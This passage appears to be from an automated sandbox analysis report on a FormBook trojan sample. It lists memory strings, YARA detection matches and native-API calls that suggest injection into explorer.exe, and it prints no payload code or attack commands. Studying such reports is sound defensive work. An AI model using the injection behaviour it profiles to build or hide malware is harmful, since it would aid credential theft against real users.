Source: explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
Source: explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
Source: explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
Source: explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
Source: explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYTL1i.img
Source: explorer.exe, 0000000A.00000002.2430854965.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1451364940.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 0000001C.00000003.2565249669.0000000008E34000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3693340134.0000000008E16000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3877919375.0000000008E16000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008E34000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2482136380.0000000008E34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.com=
Source: explorer.exe, 0000000A.00000002.2430854965.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1451364940.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comer
Source: explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
Source: explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 0000000A.00000002.2430854965.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1451364940.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com48
Source: po8909893299832.exe, InXlDTKncKkCk.exe.0.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
Source: explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
Source: explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1
Source: explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
Source: explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
Source: explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/predicting-what-the-pac-12-would-look-like-after-expansion-wi
Source: explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
Source: explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin
Source: explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
Source: explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
Source: explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
Source: explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
Source: explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 16.2.InXlDTKncKkCk.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.InXlDTKncKkCk.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.1490594410.0000000003EE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1449357318.0000000003809000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1449357318.0000000004101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3855823096.0000000002FB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3856542244.0000000003000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.1502381208.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3854578861.0000000002DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.1495831223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 16.2.InXlDTKncKkCk.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 16.2.InXlDTKncKkCk.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 16.2.InXlDTKncKkCk.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 16.2.InXlDTKncKkCk.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 16.2.InXlDTKncKkCk.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 16.2.InXlDTKncKkCk.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.1490594410.0000000003EE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.1490594410.0000000003EE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.1490594410.0000000003EE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1449357318.0000000003809000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.1449357318.0000000003809000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.1449357318.0000000003809000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1449357318.0000000004101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.1449357318.0000000004101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.1449357318.0000000004101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.3855823096.0000000002FB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000012.00000002.3855823096.0000000002FB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.3855823096.0000000002FB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.3856542244.0000000003000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000012.00000002.3856542244.0000000003000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.3856542244.0000000003000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.1502381208.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.1502381208.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.1502381208.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.3854578861.0000000002DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000012.00000002.3854578861.0000000002DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.3854578861.0000000002DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.1495831223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000010.00000002.1495831223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.1495831223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: po8909893299832.exe PID: 7572, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: InXlDTKncKkCk.exe PID: 8096, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: InXlDTKncKkCk.exe PID: 7492, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: msdt.exe PID: 6360, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: cscript.exe PID: 5188, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A52BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	9_2_01A52BF0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A52B60 NtClose,LdrInitializeThunk,	9_2_01A52B60
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A52AD0 NtReadFile,LdrInitializeThunk,	9_2_01A52AD0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A52DF0 NtQuerySystemInformation,LdrInitializeThunk,	9_2_01A52DF0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A52DD0 NtDelayExecution,LdrInitializeThunk,	9_2_01A52DD0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A52D30 NtUnmapViewOfSection,LdrInitializeThunk,	9_2_01A52D30
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A52D10 NtMapViewOfSection,LdrInitializeThunk,	9_2_01A52D10
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A52CA0 NtQueryInformationToken,LdrInitializeThunk,	9_2_01A52CA0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A52C70 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_01A52C70
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A52FB0 NtResumeThread,LdrInitializeThunk,	9_2_01A52FB0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A52F90 NtProtectVirtualMemory,LdrInitializeThunk,	9_2_01A52F90
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A52FE0 NtCreateFile,LdrInitializeThunk,	9_2_01A52FE0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A52F30 NtCreateSection,LdrInitializeThunk,	9_2_01A52F30
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A52EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	9_2_01A52EA0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A52E80 NtReadVirtualMemory,LdrInitializeThunk,	9_2_01A52E80
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A54340 NtSetContextThread,	9_2_01A54340
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A54650 NtSuspendThread,	9_2_01A54650
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A52BA0 NtEnumerateValueKey,	9_2_01A52BA0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A52B80 NtQueryInformationFile,	9_2_01A52B80
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A52BE0 NtQueryValueKey,	9_2_01A52BE0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A52AB0 NtWaitForSingleObject,	9_2_01A52AB0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A52AF0 NtWriteFile,	9_2_01A52AF0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A52DB0 NtEnumerateKey,	9_2_01A52DB0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A52D00 NtSetInformationFile,	9_2_01A52D00
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A52CF0 NtOpenProcess,	9_2_01A52CF0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A52CC0 NtQueryVirtualMemory,	9_2_01A52CC0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A52C00 NtQueryInformationProcess,	9_2_01A52C00
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A52C60 NtCreateKey,	9_2_01A52C60
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A52FA0 NtQuerySection,	9_2_01A52FA0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A52F60 NtCreateProcessEx,	9_2_01A52F60
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A52EE0 NtQueueApcThread,	9_2_01A52EE0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A52E30 NtWriteVirtualMemory,	9_2_01A52E30
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A53090 NtSetValueKey,	9_2_01A53090
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A53010 NtOpenDirectoryObject,	9_2_01A53010
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A535C0 NtCreateMutant,	9_2_01A535C0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A539B0 NtGetContextThread,	9_2_01A539B0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A53D10 NtOpenProcessToken,	9_2_01A53D10
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A53D70 NtOpenThread,	9_2_01A53D70
Source: C:\Windows\explorer.exe	Code function: 10_2_0F8EFE12 NtProtectVirtualMemory,	10_2_0F8EFE12
Source: C:\Windows\explorer.exe	Code function: 10_2_0F8EE232 NtCreateFile,	10_2_0F8EE232
Source: C:\Windows\explorer.exe	Code function: 10_2_0F8EFE0A NtProtectVirtualMemory,	10_2_0F8EFE0A
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_0041A360 NtCreateFile,	16_2_0041A360
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_0041A410 NtReadFile,	16_2_0041A410
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_0041A490 NtClose,	16_2_0041A490
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_0041A540 NtAllocateVirtualMemory,	16_2_0041A540
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_0041A45B NtReadFile,	16_2_0041A45B
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_0041A40B NtReadFile,	16_2_0041A40B
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_0041A48C NtClose,	16_2_0041A48C
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_0041A53A NtAllocateVirtualMemory,	16_2_0041A53A

Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 0_2_0097D304	0_2_0097D304
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 0_2_06BBD758	0_2_06BBD758
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 0_2_06BB44C8	0_2_06BB44C8
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 0_2_06BB6530	0_2_06BB6530
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 0_2_06BB6540	0_2_06BB6540
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 0_2_06BB6E18	0_2_06BB6E18
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 0_2_06BB4D38	0_2_06BB4D38
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 0_2_06BB4900	0_2_06BB4900
